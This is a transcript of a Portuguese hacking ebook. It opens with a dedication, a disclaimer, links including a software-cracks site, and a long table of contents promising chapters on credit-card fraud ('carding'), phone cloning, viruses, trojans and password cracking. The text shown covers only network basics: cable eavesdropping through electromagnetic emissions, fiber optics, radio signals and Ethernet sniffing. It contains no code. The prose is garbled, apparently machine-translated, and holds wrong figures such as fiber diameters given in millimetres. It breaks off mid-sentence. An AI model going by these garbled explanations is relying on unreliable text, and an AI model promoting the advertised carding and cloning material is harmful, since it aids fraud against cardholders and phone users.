Terrorismo Tecnologico Aprenda Para Sobreviver
-
Upload
marcello-augusto -
Category
Documents
-
view
454 -
download
4
description
Transcript of Terrorismo Tecnologico Aprenda Para Sobreviver
http://www.leandro-t.cjb.net/ [email protected]
Um dia a máquina dominará o mundo. Não por que
ela será mais inteligente, mas dominará a informação. Os computadores serão os maiores conhecedores
do universo e terão todas as informações existentes sobre a raça humana. Seus pensamentos, suas teses, sua psicologia, seus cálculos, sua ciência. A máquina então poderá fazer com que o próprio homem se destrua, pois ela lhe dará uma informação errada, e este homem que crê na verdade da tecnologia acreditará agirá erradamente e se auto-destruirá. Se não existir softwares capazes de fazer estas
máquinas não serem um simples servidor de arquivo será então o fim das máquinas. Sem o homem que a programa e lhe dá o seu alimento que é a informação, esta não terá mais motivo para sua existência. Serão computadores inúteis, e seres humanos incapazes de se defender. Começará então o caus!
Dedicatória Dedico este livro não só a meus familiares e
amigos, os quais estou obviamente agradecido. Mas dedico a quem o ler, pois este não será mais um medíocre que acreditará em toda a ilusão que as empresas, engenheiros, especialistas nos tentam fazer acreditar que seus sistemas são a prova de invasões. Se houvesse tanta competência e tanta segurança, ao abrirmos jornais todos os dias não nos depararíamos com manchetes sobre ataques, invasões, terrorismos, roubos virtuais... Acredito que a maior arma que possamos ter
contra estes problemas, é a informação! Quanto mais soubermos, mais aprendermos e mais discutirmos, aí sim vamos ter a capacidade de compreender o tamanho do problema. Confio na informática e acho que ela é a
solução de todos os nossos problemas, mas isso se for usada corretamente. Dedico então este livro a aqueles que nas aulas
tiravam notas baixas, dormiam em cima dos livros, mas estavam conectados ao mundo real. E em frente das longas madrugadas solitárias faziam e fazem historia com seus computadores e não são mais seres programados por uma sociedade que não consegue enxergar a verdade.
Para o Leitor Muitas das coisas deste livro foram coletadas
da Internet. Estas foram selecionadas e melhoradas, mostradas de uma forma mais clara e objetiva sem muita embolação. Mostro somente aquilo que realmente funciona, e sendo assim são coisas que devemos precaver ao montarmos uma rede para que não nos ataquem! Use este livro como um guia para o seu
planejamento de rede, como quem quer conhecer o submundo dos hackers e para quem quer ter uma segurança de rede, até por curiosidade este livro o fará abrir sua cabeça. Terei prazer em ter contato com leitores, meu
endereço é http://www.leandro-t.cjb.net/ ou escreva para [email protected]
Sites: http://www.leandro-t.cjb.net/ Meu site!.... ;-) www.cracks.am - Cracks www.superdownloads.com.br - Download www.downloads.com - Download www.google.com.br - Maior e melhor site para pesquisas www.meugrupo.com.br – grupos de discussão Use seu micro para alguma Finalidade Científica uma boa idéia é ajudar em pesquisas que buscam freqüências de radio em outros planetas entre em http://setiathome.berkeley.edu e instale o protetor de tela, ajudando assim a processar os dados obtidos pelo satélite.
Alguns textos e tabelas foram baseados de outros autores. Esses materiais foram colhidos na Internet.
Assuma seus próprios riscos, SEJA RESPONSAVEL! Os Assuntos expostos aqui são para estudos e não para serem usados contra alguém. Não me responsabilizo pelos seus atos! Gostaria de agradecer a todos. Muito obrigado
Índice Parte I (Entendendo uma rede)
P1.1Entendendo as transmissões de rede...........17 P1.2Comunicações digitais................................17 P1.3 Interferência eletromagnética (EMI).........19 P1.4 Cabo de Fibra Ótica ..................................20 P1.5 Ondas de rádio...........................................22 P1.6 Escolhendo um Meio de Transmissão.......25 P1.7 Quão valioso são os meus dados?..............25 P1.8 Quais Segmentos Levam esses Dados?.....25 P1.9 Um Intruso será Notado?...........................26 P1.10 Onde está a Coluna Vertebral.................26 P1.11 Comunicações via Ethernet......................27 P1.12 Topologias de Circuito privadas..............30 P1.13 Hardware básicos.....................................30 P1.14 Repetidores...............................................31 P1.15 Hub...........................................................32 P1.16 Bridges.....................................................32 P1.17 Switches...................................................36 P1.18 VLAN Tecnologia...................................39 P1.19 Roteadores................................................40 P1.20 Protocolos de rede....................................40 P1.21 Extensões de arquivos..............................42 P1.22 Em qual país este site está hospedado?....45
Capítulo I (Introdução) Parte I 1.1 Estamos totalmente seguros?..............................58
1.2 Quais os motivos que levam este invasor?.........59 1.3 Como é este Hacker?..........................................60 1.4 Sistema Seguro....................................................61 1.5 O administrador...................................................61 1.6 Mentiras? Imaginação?........................................62 Parte II 1.7 Os Invasores.........................................................63 1.7.1 – Lammer....................................................63 1.7.2 – Hackers....................................................63 1.7.3 – Cracker….................................................64 1.7.4 – Phreackers................................................64 1.7.5 – Funcionários.............................................65 1.7.6 – Terroristas.................................................66 1.7.7 – Carders......................................................66 1.8 Trapaceando para descobrir informações.............67 _________________________Extra Vamos entender mais sobre protocolos?.....................69
Capítulo II (S.O.)
2.1 Windows X Unix...........................................74 2.2 Vantagens do UNIX......................................75 2.3 Configurações mal planejadas e erradas........76 2.4 Ataques restritos a um tipo de sistema...........77
2.5 O que é DNS, SMTP, SNMP?.............................75 2.5.1 O Que é DNS?.............................................75
2.5.2 O que é SMTP?...........................................77 2.5.3 O que é SNMP?...........................................79 2.6 Ataques Universais...............................................81
_____________________________Extra Ataque por recusa de serviço......................................82
Capítulo III (Anônimidade) 3.1 Anônimidade........................................................84 3.2 Proxy....................................................................84 3.3 Usando o anonymizer..........................................86 3.4 Remailers.............................................................87 3.5 Lista de Proxy......................................................87
Capítulo IV (E-mails) 4.1 Encarando problemas com E-Mail.......................94
4.2 Spam.....................................................................94 4.3 E-Mail Bomba......................................................95 4.4 Remetente falso ou anônimo................................95 4.5 E-mails com arquivos auto executáveis................96 4.6 Alerta....................................................................96 4.7 Dicas.....................................................................98 Extra Proxy...........................................................................98 1 - Porque um nível de aplicação Proxy?...................100 2 - Detalhes Técnicos.................................................102
Capítulo V (Carders e Phreackers) 5.1 Como Funciona.............................................107 5.2 Obtenção de cartões......................................107 5.3 Como Cardear...............................................108 5.4 Como cardear algo concreto.........................110 5.5 Phreacker (Telefonia)....................................111 5.6 Telefones Particulares..................................119 5.7 Telefones Celulares......................................123 5.8 Telefones Públicos.......................................126 5.9 Observações sobre clonagem........................132
Capítulo VI (vírus) 6.1 Vírus de macro.....................................................134 6.2 Vírus.....................................................................138 6.3 Exemplos de vírus................................................139 6.4 Entendendo mais sobre vírus................................141 6.5 Como funciona um programa antivírus................143 6.6 Badcom.................................................................143
Capítulo VII (Bomba DOS) 7.1 O que os hackers chamam de Bomba DOS?........154 7.2 Vejamos alguns comandos...................................154
7.3 Arquivo em Lote...................................................157
Capítulo VIII (Trojan) 8.1 Trojan...................................................................162 8.2 Invasão.................................................................163 8.3 Trojans de ponte...................................................165 8.4 Trojans comerciais................................................165
8.5 Camuflando...........................................................166 8.6 Usando o Net bus 2.10 como teste........................166 8.7 Manual NetBus.....................................................170 8.7.1 Introdução....................................................170 8.7.2 Comprometimento.......................................170 8.7.3 Detecção......................................................171
8.7.4 Removendo o NetBus..................................172 8.8 Manual Back Orifice.......................................173 8.8.1 O que é o Back Orifice?...............................173 8.8.2 Quem criou o Back Orifice?.........................173 8.8.3 Como ele funciona?......................................174 8.8.4 Quem...servidores...são os clientes?.............174 8. 8.5 Comandos....................................................175
8.8.6 O Manual...................................................180 8.9 Utilizando o Anti-Trojans...................................185 8.10 Remoção do trojan............................................186
Capítulo IX (Senhas) 9.1 Veja só!...............................................................190 9.2 Senhas dos brasileiros.........................................191 9.3 Senha - não usar..................................................191 9.4 Troca de senha....................................................192 9.5 Quebrando senhas...............................................192 9.6 Senhas padrão.....................................................193
Capítulo X (Pragas) 10.1 Spam – A praga no e-mail................................199 10.2 E-Mail Bomba..................................................199
Capítulo XI (IRC) 11.1 Introdução.........................................................202 11.2 Flood.................................................................202 11.3 Colisão de Nicks...............................................203 11.4 Tomando Canais...............................................204 11.5 Flood no Canal..................................................204
11.6 Netsplit..............................................................205 11.7 Pedindo ao OP..................................................206
11.8 Guerra Avançada..............................................206 11.9 Nuke…………………………………………..207
11.10 Bombas ICMP……………………………….207 11.11 Botnet/Floodnet……………………………...208
Capítulo XII (Sniffers) 12.1 Introdução.........................................................210 12.2 Filtrando pacotes na rede..................................211
12.3 Capturando senhas............................................212 12.4 Roteadores........................................................212 12.5 Anti-Sniffers.....................................................213
Capítulo XIII (Scanners) 13.1 Introdução.........................................................215 13.2 Descobrindo falhas em um host........................215 13.3 Portas abertas com serviços ativos....................216 13.4 Máquinas ativas da subnet.................................217 13.5 Scanneando o netbios........................................219 13.6 Como Evitar então?...........................................219 13.7 HTTP e FTP......................................................220
13.8 Analisando Firewalls.........................................220 13.9 Scan em Linux...................................................221
Capítulo XIV (FireWall) 14.1 Introdução.........................................................246 14.2 Podem funcionar da seguinte forma.................246 14.3 Evasão de Firewall............................................247 14.4 Como fazer?......................................................248 14.5 Então vamos lá:.................................................251
14.5.1 Vendo sites proibidos pelo nome...........251 14.5.2 Endereços WWW proibidos por nome......252
14.6 Como bloquear então?......................................252 14.7 Bom vamos mais a fundo!................................253 14.7.1 E se funcionar pela 6667?......................253 14.8 E no caso do FTP?............................................254 14.9 Para o Administrador........................................256
Capítulo XV (Registro do Windows) 15.1 O que é o registro do Sistema?.........................258
15.2 O que acontece ?...............................................258 15.3 E como ele sabe?..............................................258 15.4 Então.................................................................258 15.4.1 Hkey_Local_Machine……………...….259 15.4.2 Hkey_Current_Config………………....259 15.4.3 Hkey_Dyn_Data……………………….259 15.4.4 Hkey_Classes_Root……………………260 15.4.5 Hkey_Users…………………………….260 15.4.6 Hkey_Current_User……………………260 15.4.7 Hkey_Local_Machine\Config……….....260 15.4.8 Hkey_Local_Machine\Software…….….261 15.4.9 Hkey_Local_Machine\System….............261 15.5 Antes de começar faça um backup.....................262 15.5.1 Como fazer o BACKUP DO REGISTRO?....262 15.5.2 Como recuperar... REGISTRO...............262 15.6 Dicas:.................................................................265
15.7 Dicas de Windows.............................................275 15.7.1 Retirando a tela inicial (logo)................275 15.7.2 Fechando múltiplas janelas abertas.......276
15.7.3 Abrindo sub-folders..............................276 15.7.4 Apagando sem ir para lixeira.................276
15.7.5 Diretório de Startup...............................276 15.7.6 Explorer não mostra todos os arquivos..277 15.7.7 Explorer não mostra .............................277
15.7.8 Tocando CD automaticamente..............277 15.7.9 Arrastando objetos ................................277
15.7.10 Forçando copiar ou mover...................277 15.7.11 Copiando e movendo arquivos............278 15.7.12 Desligando o NumLock.......................278
15.7.13 Verifivando o tamanho de um folder...278 15.7.14 Modificando os logos do Win95..........279 15.7.15 Recortar,marcar e colar........................279
15.7.16 Acelere o Desempenho ........................279 15.7.17 Atualizando de 4 Mb para 8 Mb...........280
15.7.18 Delete Arquivos Imediatamente...........280 15.7.19 Desinstalando o Windows 95...............281 15.7.20Configurando o Autoplay......................281
15.7.21 Fechando várias pastas.........................281 15.7.22 Prompt em um diretório específico......281
15.7.23 Usando nomes longos..........................282 15.7.24 Reiniciando o Windows.......................282 15.7.25 Esvaziamento de Pilha.........................282 15.7.26 Botão Iniciar.........................................282 15.7.27 Propriedades.........................................283 15.7.28 Evitando reiniciar o computador..........283 15.7.29 Impressão Rápida.................................283
15.7.30 Renomeando a Lixeira..........................284 15.7.31 Teclas de Atalho...................................284
15.7.32 Ícone do MENU INICIAR...................288 15.7.33 Um menu iniciar ideal..........................289 15.7.34 Explorer no meu computador!..............289 15.7.35 Visualizar arquivos...............................290 15.7.36 Icones Meu Computador e Lixeira?.....290 15.7.37 As pessoas podem ler meu e-mail?.......291
Capítulo XVI (Bugs e Falhas) 16.1 Introdução.........................................................294 16.2 Como surge o bug.............................................294 16.3 Exemplos de falhas...........................................295 16.4 Buffer overflows...............................................296 16.5 Race condition..................................................296 16.6 Descobrindo se algum sistema têm falhas........296 16.7 Utilizando exploits ...........................................297 16.8 No Linux...........................................................297 16.9 Correção............................................................298
16.10 Outros Bugs.....................................................298
Capítulo XVII (Crackeando) 17.1 Wordlists...........................................................301 17.2 O processo de bruteforce..................................301 17.3 Tabela completa................................................302 17.4 Política de senhas não-crackeáveis...................335
Capítulo XVIII (Entendendo MS-DOS)
18.1 MS-DOS...........................................................337 18.2 Características do MS-DOS..............................337 18.3 Comandos Internos...........................................338 18.4 Comandos Externos..........................................339 18.5 Comandos de Inicialização...............................340 18.6 Arquivos em Lote.............................................340 18.7 Outros...............................................................341
Capítulo XIX (Unix) 19.1 Autenticação Fraca............................................344 19.2 IP Spoofing........................................................346 19.3 FTP (File Transfer Protocol).............................347 19.4 MAIL.................................................................348 19.5 Enteda mais sobre o kerberus............................349 19.6 Criptografia UNIX.............................................350 19.7 Protocolos interessates.......................................350 19.7.1 PGP..........................................................350 19.7.2 SSL...........................................................350 19.8 Ferramentas...Segurança no Unix.......................351 19.8.1 SATAN....................................................351 19.8.2 TIGER......................................................352 19.9 Telnet & Unix..................................................353
Capítulo XX (Dicas de Windows) 20.1 Desktops com Windows XP…….......................357 20.2 Desktops com Windows 2000............................358 20.3 Desktops com Windows NT 4.0.........................359 20.4 Desktops com Windows 9X, SE e ME...............361 20.5 Manutenção de segurança contínua....................361 20.6 Desktops com Office..........................................363 20.7 Servidores Exchange 2000.................................364 20.8 Mantendo o SQL Seguro....................................376 20.9 Servidores SQL Server 2000..............................378 20.10 Servidores SQL Server 7.0...............................381 20.11 Segurança do SQL Server 2000........................387 20.12 Segurança com o Win 2000 Server...................389
Capítulo XXI LEIS – ESSAS QUE DEVERIAM VALER 22.1 Dos princípios que regulam a prestação de serviço por redes de computadores...........................405 22.2 Do uso de informações disponíveis em computadores ou redes de computadores.................405 22.3 dos crimes de informática.................................406 22.4 das disposições finais........................................410
Extras Uteis Conectores................................................................413 Beeps.........................................................................430 Energia......................................................................438 Tabela ASCII............................................................442 Setup.........................................................................446
Terrorismo Tecnológico Aprenda Para Sobreviver
16
Parte I Entendendo uma rede Parece complicado, mas não é, entender como funciona uma rede é
a arma mais fundamental para uma boa administração e um hacker que domina a parte física com certeza terá uma grande vantagem em obter resultados em conseguir informações, no outro lado está o administrador que se possuir um bom conhecimento de protocolos, cabeamento, ferramentas, hardwares e sistemas, poderá obter um grande sucesso na prevenção anti-hacker.
Bons estudos!
Terrorismo Tecnológico Aprenda Para Sobreviver
17
Você agora entenderá as propriedades de comunicação de transmissões de rede. Verá as inseguranças existentes em redes de comunicação e como pode desenvolver uma infra-estrutura de rede que alivia algum destes problemas.
P1.1 Entendendo as transmissões de rede A Agência de Segurança Nacional dos EUA que é a
responsável para fixar os padrões de encryptação para o governo norte-americano e também é responsável para monitorar as transmissões codificadas que são de interesse do governo. Para saber como ficar seguro deve entender que as vulnerabilidades existem e como estes problemas podem ser explorados.
Para poder projetar segurança em sua infra-estrutura de rede,
você tem que entender como os computadores fazem para se comunicam entre si.
P1.2 Comunicações digitais A comunicação digital é como se fosse feita por código Morse
ou um sistema de telégrafo, como eles são usados certos padrões de pulsos para representar caráteres diferentes durante transmissão. Se você examinar figura abaixo você verá um exemplo de uma transmissão digital. Quando uma voltagem é colocada no médio de transmissão, isto é considerado um binário 1. A ausência deste sinal é interpretada como um binário 0.
Terrorismo Tecnológico Aprenda Para Sobreviver
18
Estas formas podem variar um pouco, pois tudo é feito
eletricamente com pulsos ou falta deles, mas ruídos podem modificar um pouco essas “linhas” só que mesmo assim são muitos bem reconhecíveis.
Este formato simples que permite que a comunicação digital
possa ser tão resistente a barulhos, mas essa também pode ser sua maior desvantagem. A informação para que um caráter de ASCII se forme são transmitida em uma única onda analógica ou
Terrorismo Tecnológico Aprenda Para Sobreviver
19
vibração oito ondas separadas (ex: transmitir 01000001). Apesar desta desvantagem inerente, esta comunicação digital é normalmente muito mais eficiente do que circuitos analógicos que requerem um cuidado bem maior para corrigir transmissões ruidosas.
Quando você tem um circuito elétrico (como uma rede de
Ethernet que utiliza instalação elétrica de par trançado), você precisa de um pulso para transmitir a informação. Isto significa que o estado de voltagem constantemente está mudando o que introduz sua primeira insegurança: interferência eletromagnética.
P1.3 Interferência eletromagnética (EMI) O EMI é produzido por circuitos que usam um sinal revezado,
como comunicações analógicas ou digitais (chamado uma corrente alternada ou um circuito de CA). EMI não é produzido por circuitos que contêm um nível de poder consistente (chamado uma corrente direta ou um circuito de DC).
Por exemplo, se você pudesse fatiar um dos fios que vêm de uma bateria de carro e conseguisse ver os elétrons que passam pelo fio, você veria um fluxo fixo de energia que passa pelo cabo uniformemente constantemente. O nível de força nunca mudaria: ficaria a 12 volts constantes. Uma bateria de carro é um exemplo de um circuito de DC, porque a energia é nivelada e estável.
Agora, digamos você poderia cortar o fio de um abajur poderia tentar a mesma experiência. Você veria agora que, dependendo do tempo em que você medir a voltagem no fio, a medida seria em qualquer lugar entre -120 volts e +120 volts. O nível de voltagem do circuito estaria constantemente mudando.
O lado ruim para tudo isto é que a radiação eletromagnética pode ser medida para "sentir" o sinal que viaja dentro do fio. Os eletricistas tiveram ferramentas por muitos anos para este propósito. A maioria dos eletricistas leva um dispositivo que eles
Terrorismo Tecnológico Aprenda Para Sobreviver
20
simplesmente podem conectar ao redor de um arame para medir o sinal que viaja pelo condutor de centro (MULTIMETRO).
Há dispositivos mais sofisticados que podem medir a radiação de EMI que a partir de um cabo de rede podem registrar os pulsos digitais que viajam dentro do fio. Uma vez que um registro destes pulsos foi feito, é uma questão bem simples para converter de um formato binário para um formato legível por nós.
Quando o cabo de par trançado ficou popular devido a seu baixo custo, também se viu que ele é extremamente inseguro. Considerando que o par trançado é usado para a transmissão de sinais elétricos, EMI é produzido. E como o cabo não usa nenhum tipo de protetor, ele se torna extremamente fácil de descobrir o EMI que radia de cada condutor. Assim como o par trançado foi uma escolha excelente para uso de rede geral, não foi uma escolha muito boa se a informação que viaja ao longo dos cabos nunca ele permanecerá 100 por cento seguro.
Assim seu primeiro ponto de vulnerabilidade são seus cabos de rede atuais. Enquanto uma organização cresce e aumenta seus computadores, vai haver uma teia de cabos passando por todos os lados.
O problema redobrará se sua organização ficar situada em um espaço de escritórios compartilhados, coisa muito comum em cidades grandes e você terá cabos passando por áreas comuns.
Isto significa que um invasor que pretende roubar seus dados nunca teria que ir perto de um servidor ou um quarto de cabos para colecionar informação que estão trafegando. Um azulejo de teto estourado, um buraco na parede é tudo aquilo que ele precisa para criar um ponto de acesso a sua rede. Um invasor pode então usar um transmissor de rádio até mesmo para retransmitir as informações capturadas a um outro local. Isto significa o atacante pode continuar colecionando informação para um período estendido de tempo seguramente. Depois de instalado o circuito ele ficara transmitindo os sinais.
P1.4 Cabo de Fibra Ótica
Terrorismo Tecnológico Aprenda Para Sobreviver
21
Cabo de fibra ótica consiste em um vidro dentro de um cabo
cilíndrico de 62.5 mm de diâmetro, o “vidro” embrulhado reflete a luz no condutor de espelhos. Isto tudo é encapsulado então em uma jaqueta de fibra de KEVLAR dura.
A coisa inteira é colocada então em um tubo de PVC ou Plenum. O diâmetro desta envoltura exterior é 125 mm. Enquanto o vidro que reflete a luz for quebrável, a KEVLAR o mesmo que é usado em coletes a prova de balas ficará protegendo a fiação.
A fibra usa uma fonte luminosa para transmissão de dados. Esta fonte luminosa é tipicamente um diodo emitindo, isso produz um sinal na gama infravermelha visível. No outro fim do cabo está outro diodo que recebe os sinais. O tipo de transmissão clara pode levar um de duas formas: único modo ou multímodo.
Perigo! Nunca olhe para a luz de uma fibra ativa! A
intensidade clara é forte o bastante para causar cegueira permanente. Se você tem que inspecionar um cabo visualmente, primeiro tenha certeza que está completamente desconectado da rede. Só porque um cabo é escuro para um momento não significa que está inativo.
Fibra de modo único consiste em enviar uma luz de um só tipo
isso produz uma única freqüência de luz. Esta única freqüência é pulsada em um formato digital para transmitir dados de um lado do cabo para o outro. O benefício da fibra de modo único em cima da de multimodo é que ela é mais rápida e viajará distâncias mais longas. A desvantagen é que o hardware é extremamente caro.
Transmissões de Multimodo consiste em freqüências de luz múltiplas.
Dispersão clara: Você verá dispersão clara se você uma lanterna contra uma
parede de perto: o padrão claro na parede terá um diâmetro maior que a lente de lanterna. Se você une duas lanternas e os lustra ambos contra a parede, você adquirirá uma área mesclada no
Terrorismo Tecnológico Aprenda Para Sobreviver
22
meio onde é difícil determinar qual fonte luminosa é responsável para qual porção da iluminação. Quanto mais distante da parede que você move, maior esta área adquire. Isto é, em efeito, o que os limites à distância em fibra de multimodo (quer dizer, se você pode chamar 1.2 milhas uma limitação de distância). Como o comprimento do cabo aumenta, fica mais difícil para o diodo no fim receptor distinguir entre as freqüências claras diferentes.
Porque transmissões de multimodo são baseadas em luz em vez de ser elétrico, a fibra se beneficia de ser completamente imune a todos os tipos de EMI ser monitorado. Não há nenhuma radiação para monitorar como umas passagens eletricidade no condutor. Enquanto se pudesse ser possível cortar parte da envoltura para chegar ao condutor de vidro, faria o sistema falhar. O atacante seria então anulado, por que seus sistemas deixariam de comunicar uma vez que a fibra estaria quebrada.
A fibra tem um outro benefício principal: é capaz de apoiar conexões de largura da banda largas 10Mb, 100Mb, e GB e plano o Ethernet é todo capaz de apoiar isto. Assim junto com melhorias de segurança, há melhorias de desempenho. Isto é extremamente útil justificando o uso de fibra permitindo satisfazer largura da banda e preocupações de segurança. Se o Atacante for tentar invadir a sua rede para monitorar transmissões, ele para irá escolher um segmento de rede com muito tráfico de forma que possa pegar uma quantia maior de dados. Coincidentemente, estes também são os segmentos onde você usará cabos de fibra ótica para apoiar a quantia grande de dados que fluem este ponto entretanto na rede. Usando cabo de fibra ótica nestes segmentos, você pode ajudar proteger a integridade de sua infra-estrutura de cabos.
P1.5 Ondas de rádio São usadas para transmitir em uma rede tipicamente de 1-
20GHz e são chamado sinais de microonda. Estes sinais podem
Terrorismo Tecnológico Aprenda Para Sobreviver
23
serem fixados a sua freqüência ou espectro de expansão em natureza.
Sinais de Freqüência fixos Um sinal de freqüência fixo é uma única freqüência usada
como uma onda portadora para a informação que você deseja transmitir. Uma estação de rádio é um exemplo bom de uma única transmissão de freqüência. Quando você sintonizar à freqüência de onda do portador de uma estação em seu radio de FM, você pode ouvir o sinal que está montando.
Uma onda de portador é um sinal que é usado para levar outra informação. Esta informação é sobreposta sobre o sinal (do mesmo modo como barulho) e a onda resultante é transmitida na atmosfera. Este sinal é recebido então por um dispositivo chamado um demodulator (em efeito, seu rádio de carro é um demodulator que pode ser fixado para freqüências diferentes) que remove o sinal do portador e passa ao longo da informação restante. Uma onda do portador é usada impulsionar o poder de um sinal e estender a receptora do sinal.
Sinais de freqüência fixos são muito fáceis monitorar. Uma vez um atacante sabe a freqüência do portador, ele tem todas as informações que precisa Ele também tem toda a informação que precisa para atrapalhar seu sinal, bloqueando todas as transmissões que você está transmitindo.
Sinais não fixos: Um sinal não fixo é idêntico a um sinal de freqüência fixo,
menos que as freqüências são transmitidas em forma múltiplas. A razão que são transmitidas freqüências múltiplas é a redução de interferência por barulho. Está tecnologia surgiu durante tempo de guerra, quando um inimigo atrapalharia um sinal de freqüência fixo transmitindo em uma freqüência idêntica.
Note que ainda é possível atrapalhar os sinais. Enquanto o sinal variar por uma gama de freqüências, esta gama é tipicamente um padrão repetido. Uma vez um atacante determina
Terrorismo Tecnológico Aprenda Para Sobreviver
24
a cronometragem e o padrão da freqüência, ele está em uma posição ver as transmissões em seu monitor.
É tão fácil de monitorar ou atrapalhar sinais de rádio, mas a
maioria das transmissões confia em encryptação para misturar o sinal de forma que isto não pode ser monitorado através de monitores externos.
Há dois métodos que podem ser usados para transmitir freqüência fixa e sinais de espectro de expansão. Estes estão chamado transmissões terrestres e de espaço.
Transmissões terrestres Transmissões terrestres são sinais de rádio completamente por
terra. As estações que estão enviando são tipicamente torres de
transmissão localizadas em cima de montanhas ou edifícios altos. A gama destes sistemas normalmente é a linha de visão, embora uma visão desobstruída não é requerida. Dependendo da força notável, 50 milhas são sobre a gama o máximo usável em um sistema de transmissão terrestre. A TELEVISÃO local e estações de rádio são exemplos bons de indústrias que confiam em radiodifusões terrestre. Os sinais delas só podem ser recebidos localmente.
Transmissões pelo espaço São sinais que originaram de um sistema de terra mas são
enviados por satélites que orbitam a terra na atmosfera superior. O maior benefício de comunicações pelo espaço é gama. Podem ser recebidos sinais de quase todo canto do mundo. Os satélites podem ser afinados para aumentar ou diminuir a área de radiodifusão efetiva.
Claro que, o maior a gama de radiodifusão de um sinal, o mais suscetível é ser monitorado. Como os aumentos de gama
Terrorismo Tecnológico Aprenda Para Sobreviver
25
notáveis, assim faz a possibilidade que alguém com bastantes conhecimentos possa monitorar seus sinais se ele estiver dentro de sua área de radiodifusão.
P1.6 Escolhendo um Meio de Transmissão Você deveria considerar vários aspectos de seguranças ao
escolher um médio para transferir dados por sua rede.
P1.7 Quão valioso são os meus dados? Se você mantém bancos de dados que contêm informação
financeira por exemplo nesse caso, alguém poderia roubar seu dinheiro.
P1.8 Quais Segmentos de Rede Levam esses Dados?
Suas redes levam informação sensível diariamente. Para
proteger estas informações, você precisa entender como o fluxo é usado. Por exemplo, se você identificar as informações de contabilidade de sua organização como sensível, você deveria saber onde a informação é armazenada e quem tem acesso a isto. Um workgroup pequeno com seu próprio servidor local estará mais seguro que um banco de dados de contabilidade que pode ser acessado remotamente usando algum médio de transmissão.
Pense: Tenha muito cuidado ao analisar os tipos de serviços
que estarão passando entre suas instalações. Por exemplo, e-mail que é tipicamente alvo de pouca consideração, contudo normalmente contém mais informação sobre sua organização do
Terrorismo Tecnológico Aprenda Para Sobreviver
26
que qualquer outro serviço empresarial. Considerando que a maioria das mensagens de passagem de sistemas de e-mail no claro (se um atacante capturar este tráfico, se aparece como texto claro), e-mail deveria ser um de seus serviços de rede com melhores cuidados.
P1.9 Um Intruso será Notado? É fácil perceber um intruso quando uma organização consiste
em três ou quatro pessoas. Imagine isto com três ou quatro mil funcionarios, e a tarefa fica difícil proporcionalmente. Se você for o administrador de rede, você pode ter nenhuma prática de segurança físicas de sua organização. Porém, você pode se esforçar para escutar sua rede.
Quando você usar um médio físico, lembre-se de que você pode precisar tomar outras precauções de segurança.
P1.10 Onde está a Coluna Vertebral da sua rede?
Se um atacante que pretende monitorar sua rede, ele vai
procurar nos centrais onde ele pode pegar a maior parte das informações. Armários de cabos e quartos de servidores são objetivos principais por que estas áreas tendem a ser pontos de junção para muitas sessões de comunicação. Ao dispor sua rede, de uma atenção especial a estas áreas que considera perigoso e use algo como cabo de fibra quando possível.
Considere estes assuntos cuidadosamente ao escolher um método de transmissão para os dados. Use as informações de análise de risco que para justificar suas escolhas. Enquanto aumentar o nível de segurança da topologia puder parecer ser uma coisa cara, o custo pode ser mais que justificado quando comparou ao custo de recuperar de um intruso.
Terrorismo Tecnológico Aprenda Para Sobreviver
27
Agora que você tem um entendimento bom das mídia de transmissão disponíveis para levar seus dados, nós discutiremos como estas mídia são configuradas para funcionar como uma rede. Topologia está definida como as regras por conectar fisicamente e comunicar em determinadas mídias de rede. Cada topologia tem seu próprio jogo de regras para se conectar a seus sistemas de rede.
P1.11 Comunicações via Ethernet Agora nós examinaremos como a rede Ethernet que move as
informações de um sistema para outro por uma rede. O Ethernet foi desenvolvido em 1970 pela Xérox e evoluiu
depois no IEEE adotou as especificações 802.3. Sua flexibilidade, alta taxa de transmissão, fez rapidamente se tornar a topologia de gestão de redes em ser a melhor escolha para muitos administradores de rede.
É sem dúvida a topologia de gestão de redes mais popular. Sua habilidade para apoiar uma extensa variedade de tipos de cabo, hardware baratos, e connectividade fez se tornar usada em empresas e até para usuários domesticos
As regras de comunicação de Ethernet são Portador de Acesso Múltiplo de Senso com Descoberta de Colisão (CSMA/CD). Este até parece complicado, mas é simples bastante para entender quando você ver que:
- Os meios físicos de todas as estações da Ethernet têm que escutar o fluxo dos cabos a toda hora (até mesmo ao transmitir). Quando digo "escutar", eu quero dizer que a estação constantemente deveriam estar monitorando a rede para ver se qualquer outra estação esta enviando dados. Monitorando as transmissões de outras estações, pode-se saber se uma estação da rede esta aberta ou em uso. Deste modo, a estação não faz só cegamente a transferência de informações e interferindo nas outras estações. Também estando em um modo de escuta
Terrorismo Tecnológico Aprenda Para Sobreviver
28
constante a estação estará pronta quando outra estação quiser enviar dados.
- Acesso múltiplos são simplesmente meios em que mais de
dois computadores podem estar conectados na mesma rede, e que todas as estações poderão transmitir dados, sempre em que a rede estiver livre. É mais eficiente pois assim pode-se ter muitas máquinas ligadas a um servidor e compartilhar recursos.
- O que acontece se dois sistemas pensarem que o circuito
esta livre e tentar transmitir dados ao mesmo tempo? Quando duas estações transmitirem simultaneamente, uma
colisão acontecerá. Uma colisão é semelhante à interferência, e a transmissão resultante é cortada e os dados ficaram inuteis. Como uma estação que transmite os dados, fica olhando o meio de transmissão; se ela descobrir essa tal uma condição, a estação de trabalho assume que uma colisão aconteceu. A estação se retirará, esperará por um período aleatório de tempo, e então retransmitirá novamente.
- Note que cada estação é responsável para determinar seu
próprio período de espera aleatório antes da retransmissão. Isto ajuda assegurar que cada estação está esperando por um período diferente de tempo, evitando outra colisão. É um evento improvável que uma segunda colisão aconteça mas se ocorrer (a estação se retira se for novamente envolvida em uma colisão), cada estação dobra o seu período de espera antes de tentar novamente enviar os seus dados. Quando duas ou mais colisões sucessivas acontecerem, são chamadas de uma colisão múltipla.
Ficaria mais ou menos assim:
Terrorismo Tecnológico Aprenda Para Sobreviver
29
Fluxograma de regras de comunicação para Ethernet Infelizmente, esta também é uma das falhas de segurança
maior da Ethernet. É possível configurar um sistema para ler todas estas informações que a máquina está recebendo.
Na verdade isto serviria para que um administrador de rede pudesse monitorar a rede de uma estação central de forma que erros e estatísticas da rede fossem ser juntados. Um analisador de rede é efetivamente um computador que opera em modo de escuta. Considerando que uma estação está escutando todo o tráfico da rede de qualquer maneira, um software simples permite que um sistema registre todas as informações quer de fato ele vê.
Infelizmente, a existência deste modo também permite que uma pessoa não honesta possa escutar às escondidas as
Terrorismo Tecnológico Aprenda Para Sobreviver
30
comunicações de rede e roubar informações sensíveis. Este é particularmente um problema enorme, pois as informações passadas ao longo de uma rede de computador são transmitidas como texto claro.
Para minimizar a quantia de informação que podem ser “pegas”
